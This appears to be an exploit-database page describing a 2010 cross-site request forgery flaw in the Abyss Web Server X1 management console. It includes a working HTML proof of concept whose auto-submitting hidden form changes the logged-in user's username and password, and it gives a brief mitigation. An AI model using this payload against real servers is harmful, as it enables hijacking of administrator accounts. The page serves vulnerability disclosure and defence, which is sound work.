header-logo
Suggest Exploit
vendor:
Abyss Web Server
by:
Cross-Site Scripting Blogspot
7,5
CVSS
HIGH
Cross-Site Request Forgery
352
CWE
Product Name: Abyss Web Server
Affected Version From: X1
Affected Version To: X1
Patch Exists: YES
Related CWE: N/A
CPE: a:aprelium:abyss_web_server
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Abyss Web Server X1 XSRF

A cross-site request forgery vulnerability in the Abyss Web Server X1 management console can be exploited to change both the username and password of the logged in user.

Mitigation:

Implementing a secure token in the request can help prevent CSRF attacks.
Source

Exploit-DB raw data:

http://osvdb.org/show/osvdb/64693

<http://osvdb.org/show/osvdb/64693>
http://cross-site-scripting.blogspot.com/2010/05/abyss-web-server-x1-xsrf.html
 :

Abyss Web Server X1
XSRF<http://cross-site-scripting.blogspot.com/2010/05/abyss-web-server-x1-xsrf.html>
A cross-site request forgery vunlerability in the Abyss Web Server
X1<http://www.aprelium.com/abyssws/download.php> management
console can be exploited to change both the username and password of the
logged in user.
PoC:
 view plain<http://cross-site-scripting.blogspot.com/2010/05/abyss-web-server-x1-xsrf.html#>
print<http://cross-site-scripting.blogspot.com/2010/05/abyss-web-server-x1-xsrf.html#>
?<http://cross-site-scripting.blogspot.com/2010/05/abyss-web-server-x1-xsrf.html#>

   1. <html>
   2.     <body onload="document.forms[0].submit()">
   3.         <form method="post" action="
   http://localhost:9999/console/credentials">
   4.             <input type="hidden" name="/console/credentials/login"
   5.                    value="new_username" />
   6.             <input type="hidden" name=
   "/console/credentials/password/$pass1"
   7.                    value="new_password" />
   8.             <input type="hidden" name=
   "/console/credentials/password/$pass2"
   9.                    value="new_password" />
   10.             <input type="hidden" name="/console/credentials/bok"
   11.                    value="%C2%A0%C2%A0OK%C2%A0%C2%A0" />
   12.         </form>
   13.     </body>
   14. </html>

<http://cross-site-scripting.blogspot.com/2010/05/abyss-web-server-x1-xsrf.html>

Navigation

Suggest Exploit

Services By CQR